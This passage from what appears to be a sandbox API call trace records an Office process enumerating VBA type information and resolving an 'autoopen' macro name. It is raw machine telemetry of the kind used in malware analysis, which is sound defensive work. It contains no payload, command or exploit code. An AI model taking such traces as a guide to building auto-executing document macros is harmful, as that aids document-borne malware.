This=0x7f723a0, index=0xd1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd2, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd8, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xda, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdb, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdc, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdd, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xde, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdf, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe2, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xea, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xeb, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xec, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xed, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.306] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xee, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xef, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf2, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf3, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf6, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.307] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.307] ITypeInfo2:GetCustData (in: This=0x7f722f0, GUID=0x7fee403d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x2066d8 | out: pVarVal=0x2066d8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0045.307] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.307] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x2066d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2065e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.308] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x70) returned 0x810ff30 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff610 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x3d0) returned 0x81e31e0 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfebb0 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817bc30 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811a0d0 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188280 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883c0 [0045.308] IUnknown:AddRef (This=0x7edf740) returned 0x5 [0045.308] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206780 | out: ppvObject=0x206780*=0x0) returned 0x80004002 [0045.308] ITypeLib:GetTypeComp (in: This=0x7edf740, ppTComp=0x206778 | out: ppTComp=0x206778*=0x7edf750) returned 0x0 [0045.308] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d584d0 [0045.308] IUnknown:AddRef (This=0x7edf750) returned 0x7 [0045.308] IUnknown:Release (This=0x7edf750) returned 0x6 [0045.308] IUnknown:Release (This=0x7edf740) returned 0x5 [0045.308] IUnknown:AddRef (This=0x3dd7b80) returned 0xd [0045.309] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206780 | out: ppvObject=0x206780*=0x0) returned 0x80004002 [0045.309] ITypeLib:GetTypeComp (in: This=0x3dd7b80, ppTComp=0x206778 | out: ppTComp=0x206778*=0x3dd7b90) returned 0x0 [0045.309] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55a90 [0045.309] IUnknown:AddRef (This=0x3dd7b90) returned 0xf [0045.309] IUnknown:Release (This=0x3dd7b90) returned 0xe [0045.309] IUnknown:Release (This=0x3dd7b80) returned 0xd [0045.309] IUnknown:AddRef (This=0x7ee0550) returned 0x6 [0045.309] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206780 | out: ppvObject=0x206780*=0x0) returned 0x80004002 [0045.309] ITypeLib:GetTypeComp (in: This=0x7ee0550, ppTComp=0x206778 | out: ppTComp=0x206778*=0x7ee0560) returned 0x0 [0045.309] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55610 [0045.309] IUnknown:AddRef (This=0x7ee0560) returned 0x8 [0045.309] IUnknown:Release (This=0x7ee0560) returned 0x7 [0045.309] IUnknown:Release (This=0x7ee0550) returned 0x6 [0045.309] wcscpy_s (in: _Destination=0x7e02c68, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0045.309] wcsncpy_s (in: _Destination=0x206360, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.309] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206290, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.309] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.318] IMalloc:Alloc (This=0x7feff045380, cb=0x40) returned 0x7fc2090 [0045.318] IUnknown:AddRef (This=0x7edffb0) returned 0x4 [0045.318] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206780 | out: ppvObject=0x206780*=0x0) returned 0x80004002 [0045.318] ITypeLib:GetTypeComp (in: This=0x7edffb0, ppTComp=0x206778 | out: ppTComp=0x206778*=0x7edffc0) returned 0x0 [0045.318] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55690 [0045.318] IUnknown:AddRef (This=0x7edffc0) returned 0x6 [0045.318] IUnknown:Release (This=0x7edffc0) returned 0x5 [0045.318] IUnknown:Release (This=0x7edffb0) returned 0x4 [0045.318] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.318] IMalloc:Alloc (This=0x7feff045380, cb=0x40) returned 0x7fc20e0 [0045.318] IMalloc:Realloc (This=0x7feff045380, pv=0x810ff30, cb=0x80) returned 0x811be10 [0045.318] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="autoopen") returned 0x102ad9 [0045.318] strcpy_s (in: _Dst=0x2066b0, _DstSize=0x9, _Src="autoopen" | out: _Dst="autoopen") returned 0x0 [0045.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2066b0, cbMultiByte=9, lpWideCharStr=0x206500, cchWideChar=9 | out: lpWideCharStr="autoopen") returned 9 [0045.318] IUnknown:AddRef (This=0x7edf740) returned 0x6 [0045.318] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="autoopen", lHashVal=0x102ad9, pfName=0x2065d0, pBstrLibName=0x206500 | out: pfName=0x2065d0*=0, pBstrLibName=0x206500) returned 0x0 [0045.318] IUnknown:Release (This=0x7edf740) returned 0x5 [0045.318] IUnknown:AddRef (This=0x3dd7b80) returned 0xe [0045.318] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="autoopen", lHashVal=0x102ad9, pfName=0x2065d0, pBstrLibName=0x206500 | out: pfName=0x2065d0*=0, pBstrLibName=0x206500) returned 0x0 [0045.319] IUnknown:Release (This=0x3dd7b80) returned 0xd [0045.319] IUnknown:AddRef (This=0x7ee0550) returned 0x7 [0045.319] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="autoopen", lHashVal=0x102ad9, pfName=0x2065d0, pBstrLibName=0x206500 | out: pfName=0x2065d0*=0, pBstrLibName=0x206500) returned 0x0 [0045.319] IUnknown:Release (This=0x7ee0550) returned 0x6 [0045.319] IUnknown:AddRef (This=0x7edffb0) returned 0x5 [0045.319] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="autoopen", lHashVal=0x102ad9, pfName=0x2065d0, pBstrLibName=0x206500 | out: pfName=0x2065d0*=0, pBstrLibName=0x206500) returned 0x0 [0045.319] IUnknown:Release (This=0x7edffb0) returned 0x4 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f183d0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff790 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x3d0) returned 0x81e35c0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfef70 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817bc90 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c710 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883d0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883e0 [0045.319] IUnknown:AddRef (This=0x7edf740) returned 0x6 [0045.319] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2064f0 | out: ppvObject=0x2064f0*=0x0) returned 0x80004002 [0045.319] ITypeLib:GetTypeComp (in: This=0x7edf740, ppTComp=0x2064e8 | out: ppTComp=0x2064e8*=0x7edf750) returned 0x0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55a50 [0045.319] IUnknown:AddRef (This=0x7edf750) returned 0x8 [0045.319] IUnknown:Release (This=0x7edf750) returned 0x7 [0045.319] IUnknown:Release (This=0x7edf740) returned 0x6 [0045.319] IUnknown:AddRef (This=0x3dd7b80) returned 0xf [0045.319] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2064f0 | out: ppvObject=0x2064f0*=0x0) returned 0x80004002 [0045.319] ITypeLib:GetTypeComp (in: This=0x3dd7b80, ppTComp=0x2064e8 | out: ppTComp=0x2064e8*=0x3dd7b90) returned 0x0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d556d0 [0045.319] IUnknown:AddRef (This=0x3dd7b90) returned 0x11 [0045.319] IUnknown:Release (This=0x3dd7b90) returned 0x10 [0045.319] IUnknown:Release (This=0x3dd7b80) returned 0xf [0045.319] IUnknown:AddRef (This=0x7ee0550) returned 0x7 [0045.319] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2064f0 | out: ppvObject=0x2064f0*=0x0) returned 0x80004002 [0045.319] ITypeLib:GetTypeComp (in: This=0x7ee0550, ppTComp=0x2064e8 | out: ppTComp=0x2064e8*=0x7ee0560) returned 0x0 [0045.319] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55b50 [0045.319] IUnknown:AddRef (This=0x7ee0560) returned 0x9 [0045.319] IUnknown:Release (This=0x7ee0560) returned 0x8 [0045.319] IUnknown:Release (This=0x7ee0550) returned 0x7 [0045.319] IUnknown:AddRef (This=0x7edffb0) returned 0x5 [0045.320] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2064f0 | out: ppvObject=0x2064f0*=0x0) returned 0x80004002 [0045.320] ITypeLib:GetTypeComp (in: This=0x7edffb0, ppTComp=0x2064e8 | out: ppTComp=0x2064e8*=0x7edffc0) returned 0x0 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55b90 [0045.320] IUnknown:AddRef (This=0x7edffc0) returned 0x7 [0045.320] IUnknown:Release (This=0x7edffc0) returned 0x6 [0045.320] IUnknown:Release (This=0x7edffb0) returned 0x5 [0045.320] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206588 | out: ppvObject=0x206588*=0x0) returned 0x80004002 [0045.320] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206590 | out: ppvObject=0x206590*=0x0) returned 0x80004002 [0045.320] ITypeInfo:GetTypeComp (in: This=0x7f723a0, ppTComp=0x206598 | out: ppTComp=0x206598*=0x7f723a8) returned 0x0 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x38) returned 0x7d55bd0 [0045.320] IUnknown:AddRef (This=0x7f723a8) returned 0x5 [0045.320] IUnknown:Release (This=0x7f723a8) returned 0x4 [0045.320] IMalloc:Realloc (This=0x7feff045380, pv=0x7f183d0, cb=0x60) returned 0x8070510 [0045.320] IUnknown:Release (This=0x7f723a0) returned 0x3 [0045.320] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3952b6a, cbMultiByte=9, lpWideCharStr=0x206500, cchWideChar=10 | out: lpWideCharStr="autoopen") returned 9 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x640) returned 0x81e39a0 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfeb20 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883f0 [0045.320] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188400 [0045.321] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfeac0 [0045.321] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c7a0 [0045.321] ITypeComp:RemoteBind (in: This=0x7f723a8, szName="autoopen", lHashVal=0x102ad9, wFlags=0x0, ppTInfo=0x2064b8, pDescKind=0x2064cc, ppFuncDesc=0x2064d0, ppVarDesc=0x7fefee73907, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2064b8*=0x0, pDescKind=0x2064cc*=0, ppFuncDesc=0x2064d0, ppVarDesc=0x7fefee73907, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.321] _mbscpy_s (in: _Dst=0x2069a0, _DstSizeInBytes=0x9, _Src=0x30d2b32 | out: _Dst=0x2069a0) returned 0x0 [0045.321] CoCreateGuid (in: pguid=0x206b60 | out: pguid=0x206b60*(Data1=0xe67f69f6, Data2=0xb0d4, Data3=0x454f, Data4=([0]=0x9d, [1]=0x30, [2]=0x9c, [3]=0xbe, [4]=0xfb, [5]=0xcd, [6]=0xf2, [7]=0xd4))) returned 0x0 [0045.321] CoCreateGuid (in: pguid=0x206b60 | out: pguid=0x206b60*(Data1=0xf8a869f9, Data2=0x5e67, Data3=0x4d7d, Data4=([0]=0xab, [1]=0xcc, [2]=0xd7, [3]=0x60, [4]=0x80, [5]=0x6b, [6]=0x18, [7]=0xbe))) returned 0x0 [0045.321] IMalloc:Alloc (This=0x7feff045380, cb=0x14) returned 0x817bc50 [0045.321] IUnknown:Release (This=0x7f72450) returned 0x5 [0045.321] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206c98 | out: ppvObject=0x206c98*=0x0) returned 0x80004002 [0045.321] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c830 [0045.321] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x81e4020 [0045.322] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x81e40e0 [0045.322] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d88b0 [0045.322] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d8b00 [0045.322] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206c98 | out: ppvObject=0x206c98*=0x0) returned 0x80004002 [0045.322] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x8070580 [0045.322] _wcsicmp 